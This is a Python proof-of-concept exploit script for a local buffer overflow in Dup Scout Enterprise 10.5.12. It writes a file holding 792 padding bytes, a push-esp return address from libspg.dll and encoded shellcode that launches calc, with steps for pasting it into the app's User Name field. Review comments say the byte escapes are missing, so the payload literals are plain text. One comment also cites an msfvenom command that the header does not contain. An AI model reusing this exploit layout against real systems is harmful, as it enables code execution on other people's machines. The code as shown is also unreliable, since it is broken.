#!/usr/bin/python

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: Dup Scout Enterprise 10.5.12 - Local Buffer Overflow
# Date: 02-22-2018
# Vulnerable Software: Dup Scout Enterprise v10.5.12
# Vendor Homepage: http://www.dupscout.com
# Version: 10.5.12
# Software Link: http://www.dupscout.com/downloads.html
# Tested On: Windows 7 x86
#
# bad chars x00x0a and everything above x80
#
# PoC:
# 1. generate dupscout.txt, copy contents to clipboard
# 2. open app, select Server, select Connect
# 3. type anything into Share Name, paste dupscout.txt contents into User Name
# 4. select Connect and then OK
# 5. pop calc
#

# Assembles the proof-of-concept input described in the header above and
# writes it to a text file. The script itself only produces that file on
# disk; it does not run or contact anything.
filename = "dupscout.txt"

# 792 'A' characters placed before the `eip` value.
junk = "A" * 792

# 0x10021144 : push esp # ret | ascii {PAGE_EXECUTE_READ} [libspg.dll]
# NOTE(review): in this copy the escape backslashes are missing, so the
# literal is the 12-character text "x44x11x02x10", not four byte values;
# the same applies to `fill` and `calc` below.
eip = "".join(["x44", "x11", "x02", "x10"])

# 560 repetitions appended after the encoded payload.
fill = "x43" * 560

# Encoder output quoted from the header's msfvenom command line
# (440 bytes as generated); reproduced verbatim from the original listing.
calc = "".join((
    "x54x59x49x49x49x49x49x49x49x49x49x49x49x49x49",
    "x49x49x49x37x51x5ax6ax41x58x50x30x41x30x41x6b",
    "x41x41x51x32x41x42x32x42x42x30x42x42x41x42x58",
    "x50x38x41x42x75x4ax49x59x6cx6bx58x6bx32x53x30",
    "x57x70x67x70x53x50x4ex69x39x75x54x71x39x50x61",
    "x74x6cx4bx66x30x44x70x6cx4bx73x62x46x6cx6ex6b",
    "x66x32x66x74x4ex6bx62x52x65x78x44x4fx78x37x72",
    "x6ax46x46x44x71x6bx4fx4cx6cx57x4cx53x51x51x6c",
    "x47x72x34x6cx47x50x69x51x6ax6fx64x4dx37x71x59",
    "x57x6dx32x5ax52x51x42x61x47x4ex6bx36x32x44x50",
    "x6cx4bx73x7ax55x6cx4cx4bx42x6cx52x31x63x48x6d",
    "x33x32x68x43x31x5ax71x53x61x6cx4bx36x39x31x30",
    "x73x31x4ex33x4cx4bx50x49x65x48x39x73x46x5ax37",
    "x39x4ex6bx64x74x4ex6bx63x31x78x56x35x61x6bx4f",
    "x6ex4cx39x51x7ax6fx46x6dx63x31x4bx77x50x38x6d",
    "x30x32x55x79x66x35x53x71x6dx78x78x57x4bx61x6d",
    "x35x74x70x75x69x74x30x58x4cx4bx30x58x31x34x75",
    "x51x69x43x70x66x4cx4bx44x4cx50x4bx6cx4bx42x78",
    "x75x4cx76x61x4ex33x4ex6bx57x74x4ex6bx55x51x6a",
    "x70x4dx59x67x34x67x54x77x54x63x6bx53x6bx33x51",
    "x42x79x73x6ax33x61x69x6fx59x70x61x4fx61x4fx42",
    "x7ax6ex6bx34x52x58x6bx6ex6dx61x4dx62x4ax35x51",
    "x4cx4dx4fx75x4fx42x73x30x33x30x63x30x46x30x42",
    "x48x45x61x6ex6bx52x4fx4dx57x6bx4fx4ax75x4dx6b",
    "x4cx30x58x35x39x32x51x46x51x78x49x36x4ax35x6f",
    "x4dx4dx4dx59x6fx4ax75x55x6cx54x46x31x6cx65x5a",
    "x6dx50x59x6bx49x70x31x65x37x75x4fx4bx73x77x62",
    "x33x62x52x52x4fx53x5ax73x30x76x33x79x6fx68x55",
    "x62x43x70x61x42x4cx35x33x76x4ex53x55x30x78x43",
    "x55x43x30x41x41",
))

# Layout of the written file, in order: junk, eip, calc, fill.
buffer = "".join((junk, eip, calc, fill))

# Text-mode write; the context manager closes the handle on exit.
with open(filename, 'w') as textfile:
    textfile.write(buffer)